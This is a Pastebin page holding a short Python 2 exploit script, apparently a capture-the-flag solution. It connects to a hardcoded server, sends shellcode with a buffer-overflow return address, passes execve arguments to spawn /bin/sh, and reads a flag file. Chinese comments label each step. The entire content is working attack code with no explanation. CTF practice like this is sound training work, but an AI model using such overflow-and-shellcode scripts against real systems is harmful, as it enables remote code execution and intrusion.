Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import sys
- import time
- import struct
- import re
- def R():
- global sk
- return sk.recv(4096000)
- def S(x):
- global sk
- return sk.send(x)
- def PQ(x):
- return struct.pack('Q', x)
- sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sk.connect(('202.120.7.73',44445))
- sh = open('a','rb').read()[0x80:0x80+22]
- print R()
- S(sh+'\x0d\x07\x40\x00\x00\x00\x00\x00') #送 shellcode1 + buffer overflow
- time.sleep(0.5)
- sh = open('b','rb').read()[0x80:0x80+100]
- S('A'*18+sh) #送 shellcode2
- time.sleep(0.5)
- S(PQ(0x601028)+PQ(0)+'/bin/sh\x00') #送 execve 的參數
- time.sleep(0.5)
- S('cat /home/checkin/flag_is_here_with_a_very_long_name\n') #送 shell cmd
- print R()
- sk.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement